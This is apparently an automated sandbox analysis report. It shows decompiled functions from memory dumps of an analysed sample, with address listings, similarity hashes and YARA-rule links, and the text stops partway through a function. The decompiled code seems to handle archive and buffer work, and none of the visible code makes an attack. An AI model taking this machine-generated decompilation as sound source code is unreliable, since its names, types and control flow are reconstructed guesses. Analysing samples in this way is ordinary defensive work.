                                                                                                                                                    0x01211a39
                                                                                                                                                    0x01211a3f
                                                                                                                                                    0x01211a42
                                                                                                                                                    0x01211a47
                                                                                                                                                    0x01211a4f
                                                                                                                                                    0x01211a57
                                                                                                                                                    0x01211a5c
                                                                                                                                                    0x01211a64
                                                                                                                                                    0x01211a64
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01211a39
                                                                                                                                                    0x01211a15
                                                                                                                                                    0x01211a15
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                    • Opcode ID: 4201319ea76047e2a4091e6535f28a14804bb45023ab932b36755f4e9a45ba8d
                                                                                                                                                    • Instruction ID: 3cab714d3064023c5ca5a66794d5d7354440937c95040b93dd9623fb13aaf295
                                                                                                                                                    • Opcode Fuzzy Hash: 4201319ea76047e2a4091e6535f28a14804bb45023ab932b36755f4e9a45ba8d
                                                                                                                                                    • Instruction Fuzzy Hash: 70C1B430A242459FEF15DF78C484BB97BE1BF26200F0800B9DF469F28ADB759964CB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01213B26, Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                    			E01213B26(void* __ecx, signed int __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t76;
				signed int _t83;
				intOrPtr _t94;
				void* _t120;
				char _t121;
				void* _t123;
				void* _t130;
				signed int _t144;
				signed int _t148;
				void* _t151;
				void* _t153;

				_t143 = __edx;
				_t123 = __ecx;
				E0122E0E4(E01241B56, _t153);
				E0122E1C0();
				_t151 = _t123;
				_t156 =  *((char*)(_t151 + 0x6cc4));
				if( *((char*)(_t151 + 0x6cc4)) == 0) {
					__eflags =  *((char*)(_t151 + 0x45f0)) - 5;
					if(__eflags > 0) {
						L26:
						E01211380(__eflags, 0x1e, _t151 + 0x1e);
						goto L27;
					}
					__eflags =  *((intOrPtr*)(_t151 + 0x6cb0)) - 3;
					__eflags =  *((intOrPtr*)(_t151 + 0x45ec)) - ((0 |  *((intOrPtr*)(_t151 + 0x6cb0)) != 0x00000003) - 0x00000001 & 0x00000015) + 0x1d;
					if(__eflags > 0) {
						goto L26;
					}
					_t83 =  *(_t151 + 0x5628) |  *(_t151 + 0x562c);
					__eflags = _t83;
					if(_t83 != 0) {
						L7:
						_t120 = _t151 + 0x20e8;
						E0121C866(_t83, _t120);
						_push(_t120);
						E012217D6(_t153 - 0xe6ec, __eflags);
						_t121 = 0;
						 *((intOrPtr*)(_t153 - 4)) = 0;
						E01222BB2(0, _t153 - 0xe6ec, _t153,  *((intOrPtr*)(_t151 + 0x56c4)), 0);
						_t148 =  *(_t153 + 8);
						__eflags =  *(_t153 + 0xc);
						if( *(_t153 + 0xc) != 0) {
							L15:
							__eflags =  *((intOrPtr*)(_t151 + 0x566b)) - _t121;
							if( *((intOrPtr*)(_t151 + 0x566b)) == _t121) {
								L18:
								E0121A9C8(_t151 + 0x21a0, _t143,  *((intOrPtr*)(_t151 + 0x5640)), 1);
								 *(_t151 + 0x2108) =  *(_t151 + 0x5628);
								 *(_t151 + 0x210c) =  *(_t151 + 0x562c);
								 *((char*)(_t151 + 0x2110)) = _t121;
								E0121C919(_t151 + 0x20e8, _t151,  *(_t153 + 0xc));
								_t130 = _t151 + 0x20e8;
								 *((char*)(_t151 + 0x2111)) =  *((intOrPtr*)(_t153 + 0x10));
								 *((char*)(_t151 + 0x2137)) =  *((intOrPtr*)(_t151 + 0x5669));
								 *((intOrPtr*)(_t130 + 0x38)) = _t151 + 0x45d0;
								 *((intOrPtr*)(_t130 + 0x3c)) = _t121;
								_t94 =  *((intOrPtr*)(_t151 + 0x5630));
								_t144 =  *(_t151 + 0x5634);
								 *((intOrPtr*)(_t153 - 0x9aa4)) = _t94;
								 *(_t153 - 0x9aa0) = _t144;
								 *((char*)(_t153 - 0x9a8c)) = _t121;
								__eflags =  *((intOrPtr*)(_t151 + 0x45f0)) - _t121;
								if(__eflags != 0) {
									E01222861(_t153 - 0xe6ec,  *((intOrPtr*)(_t151 + 0x45ec)), _t121);
								} else {
									_push(_t144);
									_push(_t94);
									_push(_t130); // executed
									E01219283(_t121, _t144, _t148, __eflags); // executed
								}
								asm("sbb edx, edx");
								_t143 =  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b;
								__eflags = E0121A996(_t151 + 0x21a0, _t148, _t151 + 0x5640,  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b);
								if(__eflags != 0) {
									_t121 = 1;
								} else {
									E01217032(__eflags, 0x1f, _t151 + 0x1e, _t151 + 0x45f8);
									E01216F5B(0x124ff50, 3);
									__eflags = _t148;
									if(_t148 != 0) {
										E0121FEA0(_t148);
									}
								}
								L25:
								E01221A2F(_t153 - 0xe6ec, _t143, _t148, _t151);
								_t76 = _t121;
								goto L28;
							}
							_t143 =  *(_t151 + 0x21bc);
							__eflags =  *((intOrPtr*)(_t143 + 0x5124)) - _t121;
							if( *((intOrPtr*)(_t143 + 0x5124)) == _t121) {
								goto L25;
							}
							asm("sbb ecx, ecx");
							_t138 =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
							__eflags =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
							E0121C8D1(_t151 + 0x20e8, _t121,  *((intOrPtr*)(_t151 + 0x566c)), _t143 + 0x5024, _t138, _t151 + 0x5681,  *((intOrPtr*)(_t151 + 0x56bc)), _t151 + 0x569b, _t151 + 0x5692);
							goto L18;
						}
						__eflags =  *(_t151 + 0x5634);
						if(__eflags < 0) {
							L12:
							__eflags = _t148;
							if(_t148 != 0) {
								E01212020(_t148,  *((intOrPtr*)(_t151 + 0x5630)));
								E0121C936(_t151 + 0x20e8,  *_t148,  *((intOrPtr*)(_t151 + 0x5630)));
							} else {
								 *((char*)(_t151 + 0x2111)) = 1;
							}
							goto L15;
						}
						if(__eflags > 0) {
							L11:
							E01211380(__eflags, 0x1e, _t151 + 0x1e);
							goto L25;
						}
						__eflags =  *((intOrPtr*)(_t151 + 0x5630)) - 0x1000000;
						if(__eflags <= 0) {
							goto L12;
						}
						goto L11;
					}
					__eflags =  *((intOrPtr*)(_t151 + 0x5669)) - _t83;
					if( *((intOrPtr*)(_t151 + 0x5669)) != _t83) {
						goto L7;
					} else {
						_t76 = 1;
						goto L28;
					}
				} else {
					E01211380(_t156, 0x1d, _t151 + 0x1e);
					E01216F5B(0x124ff50, 3);
					L27:
					_t76 = 0;
					L28:
					 *[fs:0x0] =  *((intOrPtr*)(_t153 - 0xc));
					return _t76;
				}
			}

















                                                                                                                                                    0x01213b26
                                                                                                                                                    0x01213b26
                                                                                                                                                    0x01213b2b
                                                                                                                                                    0x01213b35
                                                                                                                                                    0x01213b3b
                                                                                                                                                    0x01213b3d
                                                                                                                                                    0x01213b44
                                                                                                                                                    0x01213b62
                                                                                                                                                    0x01213b69
                                                                                                                                                    0x01213dab
                                                                                                                                                    0x01213db1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01213db1
                                                                                                                                                    0x01213b71
                                                                                                                                                    0x01213b82
                                                                                                                                                    0x01213b88
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01213b94
                                                                                                                                                    0x01213b94
                                                                                                                                                    0x01213b9a
                                                                                                                                                    0x01213bab
                                                                                                                                                    0x01213bac
                                                                                                                                                    0x01213bb5
                                                                                                                                                    0x01213bba
                                                                                                                                                    0x01213bc1
                                                                                                                                                    0x01213bc6
                                                                                                                                                    0x01213bd5
                                                                                                                                                    0x01213bd8
                                                                                                                                                    0x01213bdd
                                                                                                                                                    0x01213be0
                                                                                                                                                    0x01213be3
                                                                                                                                                    0x01213c38
                                                                                                                                                    0x01213c38
                                                                                                                                                    0x01213c3e
                                                                                                                                                    0x01213c9a
                                                                                                                                                    0x01213ca8
                                                                                                                                                    0x01213cbc
                                                                                                                                                    0x01213cc9
                                                                                                                                                    0x01213ccf
                                                                                                                                                    0x01213cd5
                                                                                                                                                    0x01213cdd
                                                                                                                                                    0x01213ce3
                                                                                                                                                    0x01213cef
                                                                                                                                                    0x01213cfb
                                                                                                                                                    0x01213cfe
                                                                                                                                                    0x01213d01
                                                                                                                                                    0x01213d07
                                                                                                                                                    0x01213d0d
                                                                                                                                                    0x01213d13
                                                                                                                                                    0x01213d19
                                                                                                                                                    0x01213d1f
                                                                                                                                                    0x01213d25
                                                                                                                                                    0x01213d3e
                                                                                                                                                    0x01213d27
                                                                                                                                                    0x01213d27
                                                                                                                                                    0x01213d28
                                                                                                                                                    0x01213d29
                                                                                                                                                    0x01213d2a
                                                                                                                                                    0x01213d2a
                                                                                                                                                    0x01213d58
                                                                                                                                                    0x01213d5a
                                                                                                                                                    0x01213d69
                                                                                                                                                    0x01213d6b
                                                                                                                                                    0x01213d98
                                                                                                                                                    0x01213d6d
                                                                                                                                                    0x01213d7a
                                                                                                                                                    0x01213d86
                                                                                                                                                    0x01213d8b
                                                                                                                                                    0x01213d8d
                                                                                                                                                    0x01213d91
                                                                                                                                                    0x01213d91
                                                                                                                                                    0x01213d8d
                                                                                                                                                    0x01213d9a
                                                                                                                                                    0x01213da0
                                                                                                                                                    0x01213da6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01213da8
                                                                                                                                                    0x01213c40
                                                                                                                                                    0x01213c46
                                                                                                                                                    0x01213c4c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01213c75
                                                                                                                                                    0x01213c7e
                                                                                                                                                    0x01213c7e
                                                                                                                                                    0x01213c95
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01213c95
                                                                                                                                                    0x01213be5
                                                                                                                                                    0x01213beb
                                                                                                                                                    0x01213c0b
                                                                                                                                                    0x01213c0b
                                                                                                                                                    0x01213c0d
                                                                                                                                                    0x01213c20
                                                                                                                                                    0x01213c33
                                                                                                                                                    0x01213c0f
                                                                                                                                                    0x01213c0f
                                                                                                                                                    0x01213c0f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01213c0d
                                                                                                                                                    0x01213bed
                                                                                                                                                    0x01213bfb
                                                                                                                                                    0x01213c01
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01213c01
                                                                                                                                                    0x01213bef
                                                                                                                                                    0x01213bf9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01213bf9
                                                                                                                                                    0x01213b9c
                                                                                                                                                    0x01213ba2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01213ba4
                                                                                                                                                    0x01213ba4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01213ba4
                                                                                                                                                    0x01213b46
                                                                                                                                                    0x01213b4c
                                                                                                                                                    0x01213b58
                                                                                                                                                    0x01213db6
                                                                                                                                                    0x01213db6
                                                                                                                                                    0x01213db8
                                                                                                                                                    0x01213dbc
                                                                                                                                                    0x01213dc6
                                                                                                                                                    0x01213dc6

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                    • Opcode ID: 6f037827f330dd0cff29eaf1126eba8ab03ffb028535e376e73fb271fa95fd72
                                                                                                                                                    • Instruction ID: 2b0e4774c2d37b3d59d286c6a4eca588ac7c7ee03b03fb6558f2fbc77ddc49f3
                                                                                                                                                    • Opcode Fuzzy Hash: 6f037827f330dd0cff29eaf1126eba8ab03ffb028535e376e73fb271fa95fd72
                                                                                                                                                    • Instruction Fuzzy Hash: 8E71CF71020B46AEDB21DF34CC50AEBBBE9BF35211F40492EE6AB87145D7316648CF11
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01218329, Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                    			E01218329(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t47;
				signed int _t50;
				signed int _t51;
				void* _t53;
				signed int _t55;
				signed int _t61;
				intOrPtr _t73;
				signed int _t80;
				void* _t88;
				void* _t89;
				void* _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t98;

				_t98 = __eflags;
				_t90 = __edi;
				_t88 = __edx;
				_t73 = __ecx;
				E0122E0E4(E01241C6A, _t95);
				E0122E1C0();
				_t93 = _t73;
				_t1 = _t95 - 0x9d58; // -38232
				E012113B1(_t1, _t88, __edi, _t98,  *(_t93 + 8));
				 *(_t95 - 4) =  *(_t95 - 4) & 0x00000000;
				_t6 = _t95 - 0x9d58; // -38232
				if(E01219E37(_t6, __edi, _t93, _t93 + 0xf4) != 0) {
					_t7 = _t95 - 0x9d58; // -38232, executed
					_t47 = E012119D6(_t7, _t88, 1); // executed
					if(_t47 != 0) {
						__eflags =  *((char*)(_t95 - 0x3093));
						if( *((char*)(_t95 - 0x3093)) == 0) {
							_push(__edi);
							_t91 = 0;
							__eflags =  *(_t95 - 0x30a3);
							if( *(_t95 - 0x30a3) != 0) {
								_t10 = _t95 - 0x9d3a; // -38202
								_t11 = _t95 - 0x1010; // -2064
								_t61 = E0121FD96(_t11, _t10, 0x800);
								__eflags =  *(_t95 - 0x309e);
								while(1) {
									_t17 = _t95 - 0x1010; // -2064
									E0121BA04(_t17, 0x800, (_t61 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff);
									_t18 = _t95 - 0x2058; // -6232
									E01217098(_t18);
									_push(0);
									_t19 = _t95 - 0x2058; // -6232
									_t20 = _t95 - 0x1010; // -2064
									_t61 = E0121A406(_t18, _t88, __eflags, _t20, _t19);
									__eflags = _t61;
									if(_t61 == 0) {
										break;
									}
									_t91 = _t91 +  *((intOrPtr*)(_t95 - 0x1058));
									asm("adc ebx, [ebp-0x1054]");
									__eflags =  *(_t95 - 0x309e);
								}
								 *((intOrPtr*)(_t93 + 0x98)) =  *((intOrPtr*)(_t93 + 0x98)) + _t91;
								asm("adc [esi+0x9c], ebx");
							}
							_t23 = _t95 - 0x9d58; // -38232
							E012184C1(_t93, _t88, _t23);
							_t50 =  *(_t93 + 8);
							_t89 = 0x49;
							_pop(_t90);
							_t80 =  *(_t50 + 0x82f2) & 0x0000ffff;
							__eflags = _t80 - 0x54;
							if(_t80 == 0x54) {
								L11:
								 *((char*)(_t50 + 0x61f9)) = 1;
							} else {
								__eflags = _t80 - _t89;
								if(_t80 == _t89) {
									goto L11;
								}
							}
							_t51 =  *(_t93 + 8);
							__eflags =  *((intOrPtr*)(_t51 + 0x82f2)) - _t89;
							if( *((intOrPtr*)(_t51 + 0x82f2)) != _t89) {
								__eflags =  *((char*)(_t51 + 0x61f9));
								_t32 =  *((char*)(_t51 + 0x61f9)) == 0;
								__eflags =  *((char*)(_t51 + 0x61f9)) == 0;
								E012212B5((_t51 & 0xffffff00 | _t32) & 0x000000ff, (_t51 & 0xffffff00 | _t32) & 0x000000ff, _t93 + 0xf4);
							}
							_t33 = _t95 - 0x9d58; // -38232
							E01211F30(_t33, _t89);
							do {
								_t34 = _t95 - 0x9d58; // -38232
								_t53 = E01213A95(_t34, _t89, _t93);
								_t35 = _t95 - 0xd; // 0x7f3
								_t36 = _t95 - 0x9d58; // -38232
								_t55 = E01218525(_t93, _t36, _t53, _t35); // executed
								__eflags = _t55;
							} while (_t55 != 0);
						}
					} else {
						E01216F5B(0x124ff50, 1);
					}
				}
				_t37 = _t95 - 0x9d58; // -38232, executed
				E01211662(_t37, _t90, _t93); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t95 - 0xc));
				return 0;
			}


















                                                                                                                                                    0x01218329
                                                                                                                                                    0x01218329
                                                                                                                                                    0x01218329
                                                                                                                                                    0x01218329
                                                                                                                                                    0x0121832e
                                                                                                                                                    0x01218338
                                                                                                                                                    0x0121833e
                                                                                                                                                    0x01218340
                                                                                                                                                    0x01218349
                                                                                                                                                    0x0121834e
                                                                                                                                                    0x01218359
                                                                                                                                                    0x01218366
                                                                                                                                                    0x0121836e
                                                                                                                                                    0x01218374
                                                                                                                                                    0x0121837b
                                                                                                                                                    0x0121838e
                                                                                                                                                    0x01218395
                                                                                                                                                    0x0121839c
                                                                                                                                                    0x0121839f
                                                                                                                                                    0x012183a1
                                                                                                                                                    0x012183a7
                                                                                                                                                    0x012183ae
                                                                                                                                                    0x012183b5
                                                                                                                                                    0x012183bc
                                                                                                                                                    0x012183c1
                                                                                                                                                    0x012183dc
                                                                                                                                                    0x012183e8
                                                                                                                                                    0x012183ef
                                                                                                                                                    0x012183f4
                                                                                                                                                    0x012183fa
                                                                                                                                                    0x012183ff
                                                                                                                                                    0x01218401
                                                                                                                                                    0x01218408
                                                                                                                                                    0x0121840f
                                                                                                                                                    0x01218414
                                                                                                                                                    0x01218416
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012183c9
                                                                                                                                                    0x012183cf
                                                                                                                                                    0x012183d5
                                                                                                                                                    0x012183d5
                                                                                                                                                    0x01218418
                                                                                                                                                    0x0121841e
                                                                                                                                                    0x0121841e
                                                                                                                                                    0x01218424
                                                                                                                                                    0x0121842d
                                                                                                                                                    0x01218432
                                                                                                                                                    0x01218437
                                                                                                                                                    0x01218438
                                                                                                                                                    0x01218439
                                                                                                                                                    0x01218441
                                                                                                                                                    0x01218444
                                                                                                                                                    0x0121844b
                                                                                                                                                    0x0121844b
                                                                                                                                                    0x01218446
                                                                                                                                                    0x01218446
                                                                                                                                                    0x01218449
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01218449
                                                                                                                                                    0x01218452
                                                                                                                                                    0x01218455
                                                                                                                                                    0x0121845c
                                                                                                                                                    0x0121845e
                                                                                                                                                    0x0121846c
                                                                                                                                                    0x0121846c
                                                                                                                                                    0x01218473
                                                                                                                                                    0x01218473
                                                                                                                                                    0x01218478
                                                                                                                                                    0x0121847e
                                                                                                                                                    0x01218483
                                                                                                                                                    0x01218483
                                                                                                                                                    0x01218489
                                                                                                                                                    0x0121848e
                                                                                                                                                    0x01218493
                                                                                                                                                    0x0121849c
                                                                                                                                                    0x012184a1
                                                                                                                                                    0x012184a1
                                                                                                                                                    0x01218483
                                                                                                                                                    0x0121837d
                                                                                                                                                    0x01218384
                                                                                                                                                    0x01218384
                                                                                                                                                    0x0121837b
                                                                                                                                                    0x012184a5
                                                                                                                                                    0x012184ab
                                                                                                                                                    0x012184b6
                                                                                                                                                    0x012184c0

                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0121832E
                                                                                                                                                      • Part of subcall function 012113B1: __EH_prolog.LIBCMT ref: 012113B6
                                                                                                                                                      • Part of subcall function 012113B1: new.LIBCMT ref: 0121142F
                                                                                                                                                      • Part of subcall function 012119D6: __EH_prolog.LIBCMT ref: 012119DB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                    • Opcode ID: c3aa9a3c3c66cc8d0ec2d3c67ccd742bc0cbab1dce182b5b5525532740f5b660
                                                                                                                                                    • Instruction ID: 83b93d46783a6c6d0ccd5f76ac31fe6861025bc13cfadb484c97389a5ff7cf4c
                                                                                                                                                    • Opcode Fuzzy Hash: c3aa9a3c3c66cc8d0ec2d3c67ccd742bc0cbab1dce182b5b5525532740f5b660
                                                                                                                                                    • Instruction Fuzzy Hash: DC41C43186065A9ADF24EB60CC94BFA73F9EF30300F0440EAE64A9705ADB745BC8DB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01222DDD, Relevance: 1.6, APIs: 1, Instructions: 90COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                    			E01222DDD(void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				void* _t29;
				signed int _t30;
				signed int* _t36;
				signed int _t38;
				intOrPtr _t39;
				intOrPtr _t42;
				signed int _t44;
				void* _t47;
				void* _t48;
				void* _t56;
				void* _t60;
				signed int _t65;
				void* _t67;
				void* _t69;
				void* _t73;

				_t56 = __edx;
				_t48 = __ecx;
				_t29 = E0122E0E4(E01241E1E, _t67);
				_push(_t48);
				_push(_t48);
				_t60 = _t48;
				_t44 = 0;
				_t72 =  *((intOrPtr*)(_t60 + 0x20));
				if( *((intOrPtr*)(_t60 + 0x20)) == 0) {
					_push(0x400400); // executed
					_t42 = E0122E383(_t48, _t56, 0x400400, _t72); // executed
					 *((intOrPtr*)(_t60 + 0x20)) = _t42;
					_t29 = E0122F1A0(_t60, _t42, 0, 0x400400);
					_t69 = _t69 + 0x10;
				}
				_t73 =  *(_t60 + 0x18) - _t44;
				if(_t73 == 0) {
					_t65 =  *((intOrPtr*)(_t60 + 0x1c)) +  *((intOrPtr*)(_t60 + 0x1c));
					_t30 = _t65;
					 *(_t67 - 0x10) = _t65;
					_t58 = _t30 * 0x4ae4 >> 0x20;
					_push( ~(0 | _t73 > 0x00000000) | ( ~(_t73 > 0) | _t30 * 0x00004ae4) + 0x00000004); // executed
					_t36 = E0122E383(( ~(_t73 > 0) | _t30 * 0x00004ae4) + 4, _t30 * 0x4ae4 >> 0x20, _t65, _t73); // executed
					_pop(0x124ff50);
					 *(_t67 - 0x14) = _t36;
					 *(_t67 - 4) = _t44;
					_t74 = _t36;
					if(_t36 != 0) {
						_push(E01221AF0);
						_push(E01221910);
						_push(_t65);
						_t16 =  &(_t36[1]); // 0x4
						_t44 = _t16;
						 *_t36 = _t65;
						_push(0x4ae4);
						_push(_t44);
						E0122E1ED(_t58, _t74);
					}
					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
					 *(_t60 + 0x18) = _t44;
					_t29 = E0122F1A0(_t60, _t44, 0, _t65 * 0x4ae4);
					if(_t65 != 0) {
						_t38 = 0;
						 *(_t67 - 0x10) = 0;
						do {
							_t47 =  *(_t60 + 0x18) + _t38;
							if( *((intOrPtr*)(_t47 + 0x4ad4)) == 0) {
								 *((intOrPtr*)(_t47 + 0x4adc)) = 0x4100;
								_t39 = E01233413(0x124ff50); // executed
								 *((intOrPtr*)(_t47 + 0x4ad4)) = _t39;
								0x124ff50 = 0x30c00;
								if(_t39 == 0) {
									E01216E92(0x124ff50);
								}
								_t38 =  *(_t67 - 0x10);
							}
							_t38 = _t38 + 0x4ae4;
							 *(_t67 - 0x10) = _t38;
							_t65 = _t65 - 1;
						} while (_t65 != 0);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t67 - 0xc));
				return _t29;
			}




















                                                                                                                                                    0x01222ddd
                                                                                                                                                    0x01222ddd
                                                                                                                                                    0x01222de2
                                                                                                                                                    0x01222de7
                                                                                                                                                    0x01222de8
                                                                                                                                                    0x01222dec
                                                                                                                                                    0x01222dee
                                                                                                                                                    0x01222df0
                                                                                                                                                    0x01222df3
                                                                                                                                                    0x01222dfa
                                                                                                                                                    0x01222dfb
                                                                                                                                                    0x01222e03
                                                                                                                                                    0x01222e06
                                                                                                                                                    0x01222e0b
                                                                                                                                                    0x01222e0b
                                                                                                                                                    0x01222e0e
                                                                                                                                                    0x01222e11
                                                                                                                                                    0x01222e1c
                                                                                                                                                    0x01222e23
                                                                                                                                                    0x01222e25
                                                                                                                                                    0x01222e28
                                                                                                                                                    0x01222e3d
                                                                                                                                                    0x01222e3e
                                                                                                                                                    0x01222e43
                                                                                                                                                    0x01222e44
                                                                                                                                                    0x01222e47
                                                                                                                                                    0x01222e4a
                                                                                                                                                    0x01222e4c
                                                                                                                                                    0x01222e4e
                                                                                                                                                    0x01222e53
                                                                                                                                                    0x01222e58
                                                                                                                                                    0x01222e59
                                                                                                                                                    0x01222e59
                                                                                                                                                    0x01222e5c
                                                                                                                                                    0x01222e5e
                                                                                                                                                    0x01222e63
                                                                                                                                                    0x01222e64
                                                                                                                                                    0x01222e64
                                                                                                                                                    0x01222e69
                                                                                                                                                    0x01222e73
                                                                                                                                                    0x01222e7a
                                                                                                                                                    0x01222e84
                                                                                                                                                    0x01222e86
                                                                                                                                                    0x01222e88
                                                                                                                                                    0x01222e8b
                                                                                                                                                    0x01222e8e
                                                                                                                                                    0x01222e97
                                                                                                                                                    0x01222e9e
                                                                                                                                                    0x01222ea8
                                                                                                                                                    0x01222ead
                                                                                                                                                    0x01222eb3
                                                                                                                                                    0x01222eb6
                                                                                                                                                    0x01222ebd
                                                                                                                                                    0x01222ebd
                                                                                                                                                    0x01222ec2
                                                                                                                                                    0x01222ec2
                                                                                                                                                    0x01222ec5
                                                                                                                                                    0x01222eca
                                                                                                                                                    0x01222ecd
                                                                                                                                                    0x01222ecd
                                                                                                                                                    0x01222e8b
                                                                                                                                                    0x01222e84
                                                                                                                                                    0x01222ed8
                                                                                                                                                    0x01222ee2

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                    • Opcode ID: 0b2bd7bda5a52888c327e421653eeff7ab05c971541e98c8aeedd6424822d495
                                                                                                                                                    • Instruction ID: 086c223522c4c6509555a0e2fad64d209b0e78cd3da9ca5a85e280a2e4b283a5
                                                                                                                                                    • Opcode Fuzzy Hash: 0b2bd7bda5a52888c327e421653eeff7ab05c971541e98c8aeedd6424822d495
                                                                                                                                                    • Instruction Fuzzy Hash: 4B21B6B1E60227BBDB14DF78DC4166E76A8FB19214F04023AE605E7681D774A950C6E8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01211E30, Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                    			E01211E30(intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t34;
				intOrPtr _t41;
				intOrPtr _t51;
				void* _t62;
				unsigned int _t64;
				signed int _t66;
				intOrPtr* _t68;
				void* _t70;

				_t62 = __edx;
				_t51 = __ecx;
				E0122E0E4(E01241B0B, _t70);
				_t49 = 0;
				 *((intOrPtr*)(_t70 - 0x10)) = _t51;
